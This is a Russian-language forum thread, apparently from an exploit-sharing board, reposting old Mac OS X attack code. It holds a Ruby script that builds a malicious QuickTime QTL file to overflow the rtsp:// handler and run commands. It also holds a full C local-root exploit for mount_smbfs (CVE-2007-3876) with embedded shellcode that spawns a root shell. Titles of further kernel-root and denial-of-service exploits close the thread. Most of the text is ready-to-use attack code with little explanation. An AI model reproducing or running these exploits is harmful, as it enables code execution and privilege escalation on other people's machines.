Сообщений в теме: 3

[$iD]

Apple MacOS X 0-day эксплоит (rated as critical)
Уязвимость обнаружена в rtsp:// обработчике при обработке специально обработанной строки вида rtsp:// [random] + semicolon + [299 bytes padding + payload]. В результате атакующий может вызвать переполнение стекового буфера и выполнить произвольный код с привилегиями текущего пользователя. QuickTime для Windows систем также уязвим к обнаруженной уязвимости.

Цитата

#!/usr/bin/ruby
# Copyright © LMH <lmh [at] info-pull.com>
#               Kevin Finisterre <kf_lists [at] digitalmunition.com>
#
# Notes:
# Our command string is loaded on memory at a static address normally,
# but this depends on execution method and the string length. The address set in this exploit will
# be likely successful if we open the resulting QTL file directly, without having an
# instance of Quicktime running. Although, when using another method and string, you'll need
# to find the address.
# For 100% reliable exploitation you can always use the /bin/sh address,
# but that's not as a cool as having your box welcoming the new year.
# Do whatever you prefer. That said, enjoy.
#
# see ]]>http://projects.info...01-01-2007.html]]>

# Command string: Use whatever you like.
# Remember that changing this will also need a change of the target address for system(),
# unless string length is the same.
CMD_STRING  = "/usr/bin/say Happy new year shit bag"

# Mac OS X 10.4.8 (8L2127)
EBP_ADDR    = 0xdeadbabe
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
SETUID_ADDR = 0x900334f0
CURL_ADDR   = 0x916c24bc # /usr/bin/curl
SHELL_ADDR  = 0x918bef3a # /bin/sh
CMDSTR_ADDR = [
               SHELL_ADDR, # 0 addr to static /bin/sh     (lame)
               0x17a053c, # 1 addr to our command string (cool) :> (change as necessary)
               0xbabeface, # 2 bogus addr for testing.
               CURL_ADDR   # 3 addr to '/usr/bin/curl'
             ]

# Payload
HAPPY = ("A" * 299) +
       [EBP_ADDR].pack("V")    +
       [SYSTEM_ADDR].pack("V") +
       [SETUID_ADDR].pack("V") +
       [CMDSTR_ADDR[1]].pack("V")  # change array index for using diff. addr

# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
# although, for using our own fu, we need to spray some data for better reliability
# the goal is causing allocation of large heap chunks
NEW   = ("\x90" * 30000) + CMD_STRING   # feed the heap
YEAR  = ("\x90" * 30000) + CMD_STRING   # go johnny, go
APPLE = ("\x90" * 30000) + "EOOM"       # feed the heap more
BOYZ  = ("\x90" * 30000) + "FOOM"       # and more

# QTL output template
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
             "<?quicktime type=\"application/x-quicktime-media-link\"?>" +
             "<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
             "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
             "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"

target_file = File.open("pwnage.qtl", "w+") { |f|
f.print(QTL_CONTENT)
f.close
}

[$iD]

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

/*
 * Copyright (C) 2007-2008 Subreption LLC. All rights reserved.
 * Visit http://blog.subreption.com for exploit development notes.
 *
 * References:
 *   CVE-2007-3876
 *   http://docs.info.apple.com/article.html?artnum=307179
 *   http://seclists.org/fulldisclosure/2007/Dec/0445.html
 *   http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=633
 *   http://phrack.org/issues.html?issue=64&id=11#article
 *   BID: http://www.securityfocus.com/bid/26926
 *
 *
 * Notes:
 *  We bypass non-executable stack via shared_region_map_file_np(), as
 *  documented in a Phrack 64 article by nemo. This technique has been
 *  restricted in Leopard, but works perfectly in Tiger. Originally we
 *  developed a Ruby exploit but given the reliable nature of nemo's
 *  approach, we decided a C port would be the best option.
 *
 * Compile with: gcc -Wall mount_smbfs_root.c -o mount_smbfs_root
 * Version: 1.0 (+tiger_x86)
 *
 * Distributed under the terms of the Subreption Open Source License v1.0
 * http://static.subreption.com/public/documents/subreption-sosl-1.0.txt
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <mach/vm_prot.h>
#include <mach/i386/vm_types.h>
#include <mach/shared_memory_server.h>
#include <string.h>
#include <unistd.h>

#define BASE_ADDR		   0x9ffff000
#define PADDING_SIZE		1040
#define PAYLOAD_SIZE		PADDING_SIZE + 24

/* From osfmk/mach/i386/vm_param.h */
#define I386_PGBYTES		4096
#define I386_PGSHIFT		12
#define PAGE_SIZE		   I386_PGBYTES
#define PAGE_SHIFT		  I386_PGSHIFT

struct _shared_region_mapping_np {
	mach_vm_address_t   address;
	mach_vm_size_t	  size;
	mach_vm_offset_t	file_offset;
	vm_prot_t		   max_prot;
	vm_prot_t		   init_prot;
};

struct x86_target {
	char ebx[4];
	char esi[4];
	char edi[4];
	char ebp[4];
	char eip[4];
	char saved_eip[4];
	char extra_arg[4];
};

static int force_exploit = 0;

/* Dual PowerPC + IA32 shellcode by nemo and b-r00t.
 * seteuid(0) + setuid(0) + execve()
 */
static char dual_shellcode[] =
"\x5f\x90\xeb\x60\x38\x00\x00\xb7\x38\x60\x00\x00\x44\x00\x00\x02"
"\x38\x00\x00\x17\x38\x60\x00\x00\x44\x00\x00\x02\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x70\x39\x40\x01\x70"
"\x39\x1f\xfe\xcf\x7c\xa8\x29\xae\x38\x7f\xfe\xc8\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02"
"\x7c\xa3\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58\x31\xc0\x50\xb0\xb7\x6a\x7f\xcd\x80\x31\xc0\x50"
"\xb0\x17\x6a\x7f\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x54\x54\x53\x53\xb0\x3b\xcd\x80";

/* Unless we are forcing the exploit, exit the process */
void cond_exit(int exitcode) {
	if (!force_exploit)
		exit(exitcode);
}

/* map_shellcode(void) - returns a return address as unsigned long
 * The returned address points to our shellcode, mapped from a temporary file on disk.
 * Most of this code is based on nemo's original example in his Phrack 64 article.
 * If the mapping exists, it will fail and require -f flag to be used for avoiding
 * the exit() calls.
 */
unsigned long map_shellcode(void) {
	int fd = -1;
	unsigned long shellcodeaddr = 0x0;
	struct _shared_region_mapping_np shmreg;
	char tmpbuf[PAGE_SIZE];
	char *tmpfname;
	void *scptr = NULL;

	memset(tmpbuf, 0x90, sizeof(tmpbuf));
	scptr = (tmpbuf + PAGE_SIZE - sizeof(dual_shellcode));

	shmreg.address	 = BASE_ADDR;
	shmreg.size		= PAGE_SIZE;
	shmreg.file_offset = 0;
	shmreg.max_prot	= VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE;
	shmreg.init_prot   = VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE;

	tmpfname = "/tmp/iChat.sock";
	if ((fd = open(tmpfname, O_RDWR|O_CREAT)) == -1) {
		perror("open");
		cond_exit(EXIT_FAILURE);
	}

	memcpy(scptr, dual_shellcode, sizeof(dual_shellcode));

	if (write(fd, tmpbuf, PAGE_SIZE) != PAGE_SIZE) {
		perror("write");
		close(fd);
		cond_exit(EXIT_FAILURE);
	}

	if (syscall(SYS_shared_region_map_file_np, fd, 1, &shmreg, NULL) == -1) {
		perror("shared_region_map_file_np");

		close(fd);
		if (unlink(tmpfname) == -1)
			perror("unlink");

		cond_exit(EXIT_FAILURE);
	}

	if (close(fd) == -1)
		perror("close");

	if (unlink(tmpfname) == -1)
		perror("unlink");

	shellcodeaddr = (unsigned long)(shmreg.address + PAGE_SIZE - sizeof(dual_shellcode));

	fprintf(stdout, "Shellcode mapped: mapping starts at 0x%x, shellcode at %x\n",
			(unsigned)shmreg.address, (unsigned)shellcodeaddr);

	return shellcodeaddr;
}

int main(int argc, char *argv[])
{
	struct x86_target payload_template;
	unsigned long retaddr = 0x0;
	char payload[PAYLOAD_SIZE];
	void *curptr = NULL;

	char *vuln_argv[] = {
		"mount_smbfs",
		"-W",
		"PLACEHOLDER",
		0
	};

	char *vuln_envp[] = {
		"HISTFILE=/dev/null",
		"TERM=xterm-color",
		"PATH=/bin:/sbin:/usr/bin:/usr/sbin",
		"HISTSIZE=1",
		0
	};

	fprintf(stdout, "Mac OS X 10.4.10, 10.4.11 mount_smbfs Local Root exploit\n"
			"Copyright (c) 2007-2008 Subreption LLC. All rights reserved.\n");

	if (argc > 1) {
		if (!strcmp(argv[1], "-f"))
			force_exploit = 1;
	}
	
	retaddr = map_shellcode();

	fprintf(stdout, "Payload size: %u (%u padding bytes), Return address: 0x%x\n",
			(unsigned)sizeof(payload), PADDING_SIZE, (unsigned)retaddr);

	memset(&payload_template, 0, sizeof(payload_template));

	// Copy the correct addresses to the payload_template structure
	memcpy(payload_template.ebx, "\xfe\xca\xfe\xca", 4); // ebx = 0xcafecafe
	memcpy(payload_template.esi, "\xdd\xce\xfa\xde", 4); // esi = 0xdefacedd
	memcpy(payload_template.edi, "\xce\xfa\xed\xfe", 4); // edi = 0xfeedface
	memcpy(payload_template.ebp, "\xef\xfe\xad\xde", 4); // ebp = 0xdeadbeef
	memcpy(payload_template.eip, &retaddr, 4);		   // eip = retaddr

	memcpy(payload_template.saved_eip, "\xd0\x02\x01\x90", 4); // saved eip = exit()
	memcpy(payload_template.extra_arg, "\xfd\xf8\xff\xbf", 4); // extra arg = 0xbffff8fd

	// Fill the payload with the initial padding
	curptr = (void *)payload;
	memset(curptr, 0x41, PADDING_SIZE);

	// Copy the payload_template structure to our payload buffer
	curptr = payload + PADDING_SIZE;
	memcpy(curptr, &payload_template, sizeof(payload_template));

	// Set the value to the -W option to point at our payload
	vuln_argv[2] = (char *)payload;

	if (execve("/sbin/mount_smbfs", vuln_argv, vuln_envp) == -1) {
		perror("execve");
		exit(EXIT_FAILURE);
	}

	return 0;
}
// milw0rm.com [2007-12-19]

[###]

Apple MACOS X xnu <= 1228.9.59 Local Kernel Root Exploit

[###]

Mac OS X 10.5.7 (.CHM File) Local Finder.app Denial of Service Exploit